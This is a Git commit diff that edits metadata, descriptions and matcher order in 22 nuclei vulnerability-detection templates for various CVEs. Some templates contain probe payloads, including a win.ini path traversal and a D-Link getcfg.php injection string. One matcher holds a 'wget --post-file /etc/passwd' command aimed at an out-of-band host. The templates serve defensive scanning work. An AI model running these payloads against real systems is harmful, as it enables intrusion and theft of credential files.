daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #4681 from MostInterestingBotInTheWorld/dashboard 

Dashboard Content Enhancements
patch-1
Prince Chaddha 2022-06-28 08:54:11 +05:30 committed by GitHub
parent 314b0f3e32 aab3dbf34b
commit 50e12a7297
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
22 changed files with 189 additions and 130 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

7
cves/2020/CVE-2020-8813.yaml
View File

@ -1,15 +1,16 @@
id: CVE-2020-8813
info:
name: Cacti v1.2.8 - Unauthenticated Remote Code Execution
name: Cacti v1.2.8 - Remote Code Execution
author: gy741
severity: high
description: This vulnerability could be exploited without authentication if Cacti is enabling "Guest Realtime Graphs" privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability.
description: Cacti v1.2.8 is susceptible to remote code execution. This vulnerability could be exploited without authentication if "Guest Realtime Graphs" privileges are enabled.
reference:
- https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/
- https://github.com/Cacti/cacti/releases
- https://gist.github.com/mhaskar/ebe6b74c32fd0f7e1eedf1aabfd44129
- https://drive.google.com/file/d/1A8hxTyk_NgSp04zPX-23nPbsSDeyDFio/view
- https://nvd.nist.gov/vuln/detail/CVE-2020-8813
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
@ -29,3 +30,5 @@ requests:
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
# Enhanced by mp on 2022/06/27

18
cves/2020/CVE-2020-8982.yaml
View File

@ -1,14 +1,15 @@
id: CVE-2020-8982
info:
name: Citrix ShareFile StorageZones Unauthenticated Arbitrary File Read
name: Citrix ShareFile StorageZones <=5.10.x - Arbitrary File Read
author: dwisiswant0
severity: high
description: An unauthenticated arbitrary file read issue exists in all versions of Citrix ShareFile StorageZones (aka storage zones) Controller, including the most recent 5.10.x releases as of May 2020.
description: Citrix ShareFile StorageZones (aka storage zones) Controller versions through at least 5.10.x are susceptible to an unauthenticated arbitrary file read vulnerability.
reference:
- https://support.citrix.com/article/CTX269106
- https://drive.google.com/file/d/1Izd5MF_HHuq8YSwAyJLBErWL_nbe6f9v/view
- https://www.linkedin.com/posts/jonas-hansen-2a2606b_citrix-sharefile-storage-zones-controller-activity-6663432907455025152-8_w6/
- https://nvd.nist.gov/vuln/detail/CVE-2020-8982
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
@ -20,15 +21,20 @@ requests:
- method: GET
path:
- "{{BaseURL}}/XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
part: body
- type: status
status:
- 200
# Enhanced by mp on 2022/06/27

23
cves/2020/CVE-2020-9047.yaml
View File

@ -1,38 +1,33 @@
id: CVE-2020-9047
info:
name: exacqVision Web Service RCE
name: exacqVision Web Service - Remote Code Execution
author: dwisiswant0
severity: high
description: |
This template supports the detection part only. See references.
A vulnerability exists that could allow the execution of
unauthorized code or operating system commands on systems
running exacqVision Web Service versions 20.06.3.0 and prior
and exacqVision Enterprise Manager versions 20.06.4.0 and prior.
An attacker with administrative privileges could potentially
download and run a malicious executable that
could allow OS command injection on the system.
exacqVision Web Service is susceptible to remote code execution which could allow the execution of unauthorized code or operating system commands on systems running exacqVision Web Service versions 20.06.3.0 and prior and exacqVision Enterprise Manager versions 20.06.4.0 and prior. An attacker with administrative privileges could potentiallydownload and run a malicious executable that could allow OS command injection on the system.
reference:
- https://github.com/norrismw/CVE-2020-9047
- https://www.johnsoncontrols.com/cyber-solutions/security-advisories
- https://www.us-cert.gov/ics/advisories/ICSA-20-170-01
- https://nvd.nist.gov/vuln/detail/CVE-2020-9047
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2020-9047
cwe-id: CWE-347
tags: cve,cve2020,rce,exacqvision,service
tags: cve,cve2020,rce,exacqvision
requests:
- method: GET
path:
- "{{BaseURL}}/version.web"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "3.10.4.72058"
- "3.12.4.76544"
@ -59,7 +54,9 @@ requests:
- "20.03.2.0"
- "20.06.3.0"
condition: or
part: body
- type: status
status:
- 200
# Enhanced by mp on 2022/06/27

12
cves/2020/CVE-2020-9315.yaml
View File

@ -1,21 +1,23 @@
id: CVE-2020-9315
info:
name: Oracle iPlanet Improper Authorization
name: Oracle iPlanet Web Server 7.0.x - Authentication Bypass
author: dhiyaneshDk
severity: high
description: '** PRODUCT NOT SUPPORTED WHEN ASSIGNED ** Oracle iPlanet Web Server 7.0.x has Incorrect Access Control for admingui/version URIs in the Administration console, as demonstrated by unauthenticated read access to encryption keys. NOTE: a related support policy can be found in the www.oracle.com references attached to this CVE.'
description: |
Oracle iPlanet Web Server 7.0.x has incorrect access control for admingui/version URIs in the Administration console, as demonstrated by unauthenticated read access to encryption keys. NOTE a related support policy can be found in the www.oracle.com references attached to this CVE.
reference:
- https://www.cvebase.com/cve/2020/9315
- https://www.oracle.com/support/lifetime-support/
- https://www.oracle.com/us/assets/lifetime-support-middleware-069163.pdf
- https://wwws.nightwatchcybersecurity.com/2020/05/10/two-vulnerabilities-in-oracles-iplanet-web-server-cve-2020-9315-and-cve-2020-9314/
- https://nvd.nist.gov/vuln/detail/CVE-2020-9315
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2020-9315
cwe-id: CWE-306
tags: cve,cve2020,oracle
tags: cve,cve2020,oracle,auth-bypass,iplanet
requests:
- method: GET
@ -37,4 +39,6 @@ requests:
- type: status
status:
- 200
- 200
# Enhanced by mp on 2022/06/27

17
cves/2020/CVE-2020-9376.yaml
View File

@ -1,22 +1,23 @@
id: CVE-2020-9376
info:
name: D-Link Information Disclosure via getcfg.php
name: D-Link DIR-610 Devices - Information Disclosure
author: whynotke
severity: high
description: |
D-Link DIR-610 devices allow Information Disclosure via SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1 to getcfg.php.
D-Link DIR-610 devices allow information disclosure via SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1 to getcfg.php.
NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
reference:
- https://gist.github.com/GouveaHeitor/dcbb67b301cc45adc00f8a6a2a0a590f
- https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10182
- https://www.dlink.com.br/produto/dir-610/
- https://nvd.nist.gov/vuln/detail/CVE-2020-9376
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2020-9376
cwe-id: CWE-74
tags: cve,cve2020,dlink,disclosure
tags: cve,cve2020,dlink,disclosure,router
requests:
- method: POST
@ -29,14 +30,16 @@ requests:
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "<name>Admin</name>"
- "</usrid>"
- "</password>"
condition: and
part: body
- type: status
status:
- 200
# Enhanced by mp on 2022/06/27

21
cves/2020/CVE-2020-9425.yaml
View File

@ -1,33 +1,38 @@
id: CVE-2020-9425
info:
name: rConfig Unauthenticated Sensitive Information Disclosure
name: rConfig <3.9.4 - Sensitive Information Disclosure
author: madrobot
severity: high
description: An issue was discovered in includes/head.inc.php in rConfig before 3.9.4. An unauthenticated attacker can retrieve saved cleartext credentials via a GET request to settings.php. Because the application
does not exit after a redirect is applied, the rest of the page still executed, resulting in the disclosure of cleartext credentials in the response.
description: rConfig prior to version 3.9.4 is susceptible to sensitive information disclosure. An unauthenticated attacker can retrieve saved cleartext credentials via a GET request to settings.php. Because the application does not exit after a redirect is applied, the rest of the page still executes, resulting in the disclosure of cleartext credentials in the response.
reference:
- https://blog.hivint.com/rconfig-3-9-3-unauthenticated-sensitive-information-disclosure-ead4ed88f153
- https://github.com/rconfig/rconfig/commit/20f4e3d87e84663d922b937842fddd9af1b68dd9
- https://nvd.nist.gov/vuln/detail/CVE-2020-9425
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2020-9425
cwe-id: CWE-670
tags: cve,cve2020,rconfig
tags: cve,cve2020,rconfig.exposure
requests:
- method: GET
path:
- "{{BaseURL}}/settings.php"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "defaultNodeUsername"
- "defaultNodePassword"
condition: and
part: body
- type: status
status:
- 200
# Enhanced by mp on 2022/06/27

8
cves/2020/CVE-2020-9490.yaml
View File

@ -1,10 +1,10 @@
id: CVE-2020-9490
info:
name: Apache HTTP Server 2.4.20-2.4.43 - HTTP/2 Cache-Digest DoS
name: Apache HTTP Server 2.4.20-2.4.43 - HTTP/2 Cache-Digest Denial of Service Attack
author: philippedelteil
severity: high
description: Apache HTTP Server versions 2.4.20 to 2.4.43. A specially crafted value for the 'Cache-Digest' header in a HTTP/2 request would result in a crash when the server actually tries to HTTP/2 PUSH a resource afterwards. Configuring the HTTP/2 feature via "H2Push off" will mitigate this vulnerability for unpatched servers.
description: Apache HTTP Server versions 2.4.20 to 2.4.43 are susceptible to a denial of service attack. A specially crafted value for the 'Cache-Digest' header in a HTTP/2 request would result in a crash when the server actually tries to HTTP/2 PUSH a resource afterwards. Configuring the HTTP/2 feature via "H2Push off" will mitigate this vulnerability for unpatched servers.
reference:
- https://httpd.apache.org/security/vulnerabilities_24.html
- https://bugs.chromium.org/p/project-zero/issues/detail?id=2030
@ -24,6 +24,8 @@ requests:
matchers:
- type: regex
part: header
regex:
- "Apache/2\\.4\\.([3-3][0-9]|2[0-9]|4[0-3])"
part: header
# Enhanced by mp on 2022/06/27

12
cves/2021/CVE-2021-20123.yaml
View File

@ -1,22 +1,22 @@
id: CVE-2021-20123
info:
name: Draytek VigorConnect - Unauthenticated Local File Inclusion DownloadFileServlet
name: Draytek VigorConnect 1.6.0-B - Local File Inclusion
author: 0x_Akoko
severity: high
description: |
A local file inclusion vulnerability exists in Draytek VigorConnect 1.6.0-B3 in the file download functionality of the DownloadFileServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges.
Draytek VigorConnect 1.6.0-B3 is susceptible to local file inclusion in the file download functionality of the DownloadFileServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges.
reference:
- https://www.tenable.com/security/research/tra-2021-42
- https://www.cvedetails.com/cve/CVE-2021-20123/
- https://nvd.nist.gov/vuln/detail/CVE-2021-20123
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-20123
cwe-id: CWE-668
metadata:
shodan-query: http.html:"VigorConnect"
verified: true
shodan-query: http.html:"VigorConnect"
tags: cve,cve2021,draytek,lfi,vigorconnect
requests:
@ -28,7 +28,9 @@ requests:
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- "for 16-bit app support"
@ -42,3 +44,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/06/27

10
cves/2021/CVE-2021-20124.yaml
View File

@ -1,22 +1,22 @@
id: CVE-2021-20124
info:
name: Draytek VigorConnect - Unauthenticated Local File Inclusion WebServlet
name: Draytek VigorConnect 6.0-B3 - Local File Inclusion
author: 0x_Akoko
severity: high
description: A local file inclusion vulnerability exists in Draytek VigorConnect 1.6.0-B3 in the file download functionality of the WebServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges.
description: Draytek VigorConnect 1.6.0-B3 is susceptible to local file inclusion in the file download functionality of the WebServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges.
reference:
- https://www.tenable.com/security/research/tra-2021-42
- https://www.draytek.com/products/vigorconnect/
- https://www.cvedetails.com/cve/CVE-2021-20124
- https://nvd.nist.gov/vuln/detail/CVE-2021-20124
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-20124
cwe-id: CWE-668
metadata:
shodan-query: http.html:"VigorConnect"
verified: true
shodan-query: http.html:"VigorConnect"
tags: cve,cve2021,draytek,lfi,vigorconnect
requests:
@ -42,3 +42,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/06/27

10
cves/2021/CVE-2021-21287.yaml
View File

@ -1,15 +1,15 @@
id: CVE-2021-21287
info:
name: MinIO Browser API SSRF
name: MinIO Browser API - Server-Side Request Forgery
author: pikpikcu
severity: high
description: MinIO is a High Performance Object Storage released under Apache License v2.0. In MinIO before version RELEASE.2021-01-30T00-20-58Z there is a server-side request forgery vulnerability.
description: MinIO Browser API before version RELEASE.2021-01-30T00-20-58Z contains a server-side request forgery vulnerability.
reference:
- https://github.com/minio/minio/security/advisories/GHSA-m4qq-5f7c-693q
- https://www.leavesongs.com/PENETRATION/the-collision-of-containers-and-the-cloud-pentesting-a-MinIO.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-21287
- https://github.com/minio/minio/pull/11337
- https://nvd.nist.gov/vuln/detail/CVE-2021-21287
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
cvss-score: 7.7
@ -37,4 +37,6 @@ requests:
- type: word
words:
- "We encountered an internal error"
- "We encountered an internal error"
# Enhanced by mp on 2022/06/27

17
cves/2021/CVE-2021-21311.yaml
View File

@ -1,14 +1,16 @@
id: CVE-2021-21311
info:
name: Adminer SSRF Using Verbose Error Messages
name: Adminer <4.7.9 - Server-Side Request Forgery
author: Adam Crosser
severity: high
description: Adminer is an open-source database management in a single PHP file. In adminer from version 4.0.0 and before 4.7.9 there is a server-side request forgery vulnerability. Users of Adminer versions bundling all drivers (e.g. `adminer.php`) are affected. This is fixed in version 4.7.9.
description: Adminer from version 4.0.0 through 4.7.8 is susceptible to server-side request forgery due to its use of verbose error messages. Users of Adminer versions bundling all drivers (e.g. `adminer.php`) are affected.
remediation: Upgrade to version 4.7.9 or later.
reference:
- https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6
- https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf
- https://packagist.org/packages/vrana/adminer
- https://nvd.nist.gov/vuln/detail/CVE-2021-21311
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
@ -25,11 +27,14 @@ requests:
matchers-condition: and
matchers:
- type: status
status:
- 403
- type: word
part: body
words:
- "&lt;title&gt;400 - Bad Request&lt;/title&gt;"
- "<title>400 - Bad Request</title>"
- type: status
status:
- 403
# Enhanced by mp on 2022/06/27

20
cves/2021/CVE-2021-21315.yaml
View File

@ -1,20 +1,22 @@
id: CVE-2021-21315
info:
name: Node.js Systeminformation Command Injection
name: Node.JS System Information Library <5.3.1 - Remote Command Injection
author: pikpikcu
severity: high
description: The System Information Library for Node.JS (npm package "systeminformation") is an open source collection of functions to retrieve detailed hardware, system and OS information. In systeminformation before version 5.3.1 there is a command injection vulnerability. Problem was fixed in version 5.3.1. As a workaround instead of upgrading, be sure to check or sanitize service parameters that are passed to si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() ... do only allow strings, reject any arrays. String sanitation works as expected.
description: Node.JS System Information Library System before version 5.3.1 is susceptible to remote command injection. Node.JS (npm package "systeminformation") is an open source collection of functions to retrieve detailed hardware, system and OS information.
reference:
- https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC
- https://security.netapp.com/advisory/ntap-20210312-0007/
- https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-2m8v-572m-ff2v
- https://www.npmjs.com/package/systeminformation
- https://nvd.nist.gov/vuln/detail/CVE-2021-21315
classification:
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.8
cve-id: CVE-2021-21315
cwe-id: CWE-78
remediation: Upgrade to version 5.3.1. As a workaround instead of upgrading, be sure to check or sanitize service parameters that are passed to si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() ... do only allow strings, reject any arrays. String sanitation works as expected
tags: nodejs,cve,cve2021,cisa
requests:
@ -26,19 +28,21 @@ requests:
matchers:
- type: word
words:
- "application/json"
part: header
- type: word
part: body
words:
- "wget --post-file /etc/passwd {{interactsh-url}}"
- name
- running
- pids
part: body
condition: and
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200
# Enhanced by mp on 2022/06/27

29
cves/2021/CVE-2021-21389.yaml
View File

@ -1,21 +1,23 @@
id: CVE-2021-21389
info:
name: BuddyPress REST API Privilege Escalation to RCE
name: BuddyPress REST API <7.2.1 - Privilege Escalation/Remote Code Execution
author: lotusdll
severity: high
description: The BuddyPress WordPress plugin was affected by an REST API Privilege Escalation to RCE
description: WordPress BuddyPress before version 7.2.1 is susceptible to a privilege escalation vulnerability that can be leveraged to perform remote code execution.
remediation: This issue has been remediated in WordPress BuddyPress 7.2.1.
reference:
- https://github.com/HoangKien1020/CVE-2021-21389
- https://buddypress.org/2021/03/buddypress-7-2-1-security-release/
- https://codex.buddypress.org/releases/version-7-2-1/
- https://github.com/buddypress/BuddyPress/security/advisories/GHSA-m6j4-8r7p-wpp3
- https://nvd.nist.gov/vuln/detail/CVE-2021-21389
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2021-21389
cwe-id: CWE-863
tags: cve,cve2021,wordpress,wp-plugin,rce
tags: cve,cve2021,wordpress,wp-plugin,rce,wp,buddypress
requests:
- raw:
@ -33,20 +35,23 @@ requests:
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "application/json"
part: header
- type: word
part: body
words:
- "user_login"
- "registered"
- "activation_key"
- "user_email"
part: body
condition: and
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200
# Enhanced by mp on 2022/06/27

11
cves/2021/CVE-2021-21975.yaml
View File

@ -1,13 +1,14 @@
id: CVE-2021-21975
info:
name: vRealize Operations Manager API SSRF (VMWare Operations)
name: vRealize Operations Manager API - Server-Side Request Forgery
author: luci
severity: high
description: A malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials or trigger Remote Code Execution using CVE-2021-21983.
description: vRealize Operations Manager API is susceptible to server-side request forgery. A malicious actor with network access to the vRealize Operations Manager API can steal administrative credentials or trigger remote code execution using CVE-2021-21983.
reference:
- https://www.vmware.com/security/advisories/VMSA-2021-0004.html
- http://packetstormsecurity.com/files/162349/VMware-vRealize-Operations-Manager-Server-Side-Request-Forgery-Code-Execution.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-21975
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
@ -26,13 +27,17 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'vRealize Operations Manager'
- 'thumbprint'
- 'address'
condition: and
part: body
- type: status
status:
- 200
# Enhanced by mp on 2022/06/27

17
cves/2021/CVE-2021-22053.yaml
View File

@ -1,16 +1,15 @@
id: CVE-2021-22053
info:
name: RCE through SpringEL expressions in Spring Cloud Netflix Hystrix Dashboard < 2.2.10.RELEASE
name: Spring Cloud Netflix Hystrix Dashboard <2.2.10 - Remote Code Execution
author: forgedhallpass
severity: high
description: |
Applications using both `spring-cloud-netflix-hystrix-dashboard` and `spring-boot-starter-thymeleaf` expose a way to execute code submitted within the request URI path during the resolution of view templates.
When a request is made at `/hystrix/monitor;[user-provided data]`, the path elements following `hystrix/monitor` are being evaluated as SpringEL expressions, which can lead to code execution.
Spring Cloud Netflix Hystrix Dashboard prior to version 2.2.10 is susceptible to remote code execution. Applications using both `spring-cloud-netflix-hystrix-dashboard` and `spring-boot-starter-thymeleaf` expose a way to execute code submitted within the request URI path during the resolution of view templates. When a request is made at `/hystrix/monitor;[user-provided data]`, the path elements following `hystrix/monitor` are being evaluated as SpringEL expressions, which can lead to code execution.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-22053
- https://github.com/SecCoder-Security-Lab/spring-cloud-netflix-hystrix-dashboard-cve-2021-22053
- https://tanzu.vmware.com/security/cve-2021-22053
- https://nvd.nist.gov/vuln/detail/CVE-2021-22053
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
@ -25,10 +24,14 @@ requests:
matchers-condition: and
matchers:
- type: status
status:
- 500
- type: word
part: interactsh_protocol
words:
- "dns"
- type: status
status:
- 500
# Enhanced by mp on 2022/06/27

15
cves/2021/CVE-2021-22054.yaml
View File

@ -1,14 +1,14 @@
id: CVE-2021-22054
info:
name: VMWare Workspace One UEM SSRF
name: VMWare Workspace ONE UEM - Server-Side Request Forgery
author: h1ei1
severity: high
description: VMware Workspace ONE UEM console 20.0.8 prior to 20.0.8.37, 20.11.0 prior to 20.11.0.40, 21.2.0 prior to 21.2.0.27, and 21.5.0 prior to 21.5.0.37 contain an SSRF vulnerability. This issue may allow a malicious actor with network access to UEM to send their requests without authentication and to gain access to sensitive information.
description: VMware Workspace ONE UEM console 20.0.8 prior to 20.0.8.37, 20.11.0 prior to 20.11.0.40, 21.2.0 prior to 21.2.0.27, and 21.5.0 prior to 21.5.0.37 contain a server-side request forgery vulnerability. This issue may allow a malicious actor with network access to UEM to send their requests without authentication and to gain access to sensitive information.
reference:
- https://blog.assetnote.io/2022/04/27/vmware-workspace-one-uem-ssrf/
- https://nvd.nist.gov/vuln/detail/CVE-2021-22054
- https://www.vmware.com/security/advisories/VMSA-2021-0029.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-22054
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
@ -25,10 +25,13 @@ requests:
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Interactsh Server"
- type: status
status:
- 200
# Enhanced by mp on 2022/06/27

11
cves/2021/CVE-2021-22214.yaml
View File

@ -1,16 +1,11 @@
id: CVE-2021-22214
info:
name: Unauthenticated Gitlab SSRF - CI Lint API
name: Gitlab CE/EE 10.5 - Server-Side Request Forgery
author: Suman_Kar,GitLab Red Team
severity: high
description: |
When requests to the internal network for webhooks are enabled,
a server-side request forgery vulnerability in GitLab CE/EE affecting all
versions starting from 10.5 was possible to exploit for an unauthenticated
attacker even on a GitLab instance where registration is limited.
The same vulnerability actually spans multiple CVEs, due to similar reports
that were fixed across separate patches. These CVEs are:
GitLab CE/EE versions starting from 10.5 are susceptible to a server-side request forgery vulnerability when requests to the internal network for webhooks are enabled, even on a GitLab instance where registration is limited. The same vulnerability actually spans multiple CVEs, due to similar reports that were fixed across separate patches. These CVEs are:
- CVE-2021-39935
- CVE-2021-22214
- CVE-2021-22175
@ -47,3 +42,5 @@ requests:
part: body
words:
- "does not have valid YAML syntax"
# Enhanced by mp on 2022/06/27

13
cves/2021/CVE-2021-25052.yaml
View File

@ -1,10 +1,10 @@
id: CVE-2021-25052
info:
name: The Button Generator WordPress plugin < 2.3.3 - RFI
name: WordPress Button Generator <2.3.3 - Remote File Inclusion
author: cckuailong
severity: high
description: The Button Generator WordPress plugin before 2.3.3 within the wow-company admin menu page allows to include() arbitrary file with PHP extension (as well as with data:// or http:// protocols), thus leading to CSRF RCE.
description: WordPress Button Generator before 2.3.3 within the wow-company admin menu page allows arbitrary file inclusion with PHP extensions (as well as with data:// or http:// protocols), thus leading to cross-site request forgery and remote code execution.
reference:
- https://wpscan.com/vulnerability/a01844a0-0c43-4d96-b738-57fe5bfbd67a
- https://nvd.nist.gov/vuln/detail/CVE-2021-25052
@ -34,12 +34,15 @@ requests:
cookie-reuse: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: interactsh_protocol
name: http
words:
- "http"
- type: status
status:
- 200
# Enhanced by mp on 2022/06/27

33
cves/2021/CVE-2021-25646.yaml
View File

@ -1,17 +1,17 @@
id: CVE-2021-25646
info:
name: Apache Druid RCE
name: Apache Druid - Remote Code Execution
author: pikpikcu
severity: high
description: |
Apache Druid is a column-oriented open source distributed data storage written in Java, designed to quickly obtain large amounts of event data and provide low-latency queries on the data.
Apache Druid lacks authorization and authentication by default. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server.
Apache Druid is susceptible to remote code execution because by default it lacks authorization and authentication. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server.
reference:
- https://paper.seebug.org/1476/
- https://lists.apache.org/thread.html/rfda8a3aa6ac06a80c5cbfdeae0fc85f88a5984e32ea05e6dda46f866%40%3Cdev.druid.apache.org%3E
- http://www.openwall.com/lists/oss-security/2021/01/29/6
- https://lists.apache.org/thread.html/r64431c2b97209f566b5dff92415e7afba0ed3bfab4695ebaa8a62e5d@%3Cdev.druid.apache.org%3E
- https://nvd.nist.gov/vuln/detail/CVE-2021-25864
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
@ -63,22 +63,25 @@ requests:
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "application/json"
part: header
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: body
words:
- "numRowsRead"
- "numRowsIndexed"
part: body
condition: and
- type: regex
regex:
- "root:.*:0:0:"
part: body
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200
# Enhanced by mp on 2022/06/27

8
cves/2021/CVE-2021-25864.yaml
View File

@ -1,13 +1,13 @@
id: CVE-2021-25864
info:
name: Hue Magic - Directory Traversal
name: Hue Magic 3.0.0 - Local File Inclusion
author: 0x_Akoko
severity: high
description: node-red-contrib-huemagic 3.0.0 is affected by hue/assets/..%2F Directory Traversal.in the res.sendFile API, used in file hue-magic.js, to fetch an arbitrary file.
description: Hue Magic 3.0.0 is susceptible to local file inclusion via the res.sendFile API.
reference:
- https://github.com/Foddy/node-red-contrib-huemagic/issues/217
- https://www.cvedetails.com/cve/CVE-2021-25864
- https://nvd.nist.gov/vuln/detail/CVE-2021-25864
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
@ -32,3 +32,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/06/27

6
cves/2021/CVE-2021-27748.yaml
View File

@ -1,14 +1,15 @@
id: CVE-2021-27748
info:
name: IBM WebSphere Portal SSRF
name: IBM WebSphere HCL Digital Experience - Server-Side Request Forgery
author: pdteam
severity: high
description: |
A Server Side Request Forgery vulnerability affects HCL Digital Experience, on-premise deployments and containers.
IBM WebSphere HCL Digital Experience is susceptible to server-side request forgery vulnerability that impacts on-premise deployments and containers.
reference:
- https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/
- https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0095665
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27748
classification:
cve-id: CVE-2021-27748
metadata:
@ -27,6 +28,7 @@ requests:
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- "Interactsh Server"

1
cves/2021/CVE-2021-46379.yaml
View File

@ -9,7 +9,6 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2021-46379
- https://drive.google.com/file/d/1rrlwnIxSHEoO4SMAHRPKZSRzK5MwZQRf/view
- https://www.dlink.com/en/security-bulletin
- https://www.dlink.com/en/security-bulletin/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1